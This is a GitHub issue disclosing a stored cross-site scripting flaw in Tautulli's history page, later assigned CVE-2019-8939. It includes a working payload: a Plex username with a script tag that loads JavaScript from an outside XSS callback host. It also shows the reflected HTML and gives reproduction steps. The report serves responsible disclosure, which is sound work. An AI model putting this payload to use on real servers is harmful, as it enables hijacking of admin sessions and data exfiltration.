Skip to content
This repository has been archived by the owner on Mar 8, 2021. It is now read-only.

Insufficient username filtering in history.html allows XSS and data exfiltration #161

Closed
geeknik opened this issue Feb 19, 2019 · 1 comment

Comments

@geeknik
Copy link

geeknik commented Feb 19, 2019

Version:
2.1.26

What you did?
I changed my Plex username to geeknik"><script src=https://zed.xss.ht></script>.

What happened?
Tautulli does not filter out JavaScript when reading usernames and when the admin visits the History page, the JavaScript is executed in the context of said admin.

Lines 112-128 are vulnerable:
https://github.com/Tautulli/Tautulli/blob/56a91de2c4ff0fdd8fbdff4dd7d7677bd16a4b28/data/interfaces/default/history.html#L112

Here we can see how it is reflected:

<label>
     <select name="history-user" id="history-user" class="btn" style="color: inherit;">
     <option value="">All Users</option>
     <option disabled="">────────────</option>
     <option value="xxx">user1</option><option value="xxx">user2</option><option value="xxx">user3</option><option value="xxx">user4</option><option value="xxx">DomitianX</option><option value="xxx">geeknik"&gt;<script src="https://zed.xss.ht"></script></option><option value="xxx">user5</option><option value="xxx">user6</option><option value="xxx">user7</option><option value="xxx">user8</option><option value="0">Local</option><option value="xxx">user9</option><option value="xxx">user10</option><option value="xxx">user11</option><option value="xxx">user12</option><option value="xxx">user13</option><option value="xxx">user14</option><option value="xxx">user15</option><option value="xxx">user16</option><option value="xxx">user17</option></select>
</label>

What you expected?
I didn't expect my friend's Plex server to leak a bunch of information at me.

How can we reproduce your issue?
Setup a Plex Media Server, Install Tautulli, create a normal Plex user account to consume media. Change the user account name to something with JavaScript. Visit the Tautulli History page.

@geeknik
Copy link
Author

geeknik commented Feb 19, 2019

CVE-2019-8939 has been assigned to this flaw by MITRE.

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Development

No branches or pull requests

2 participants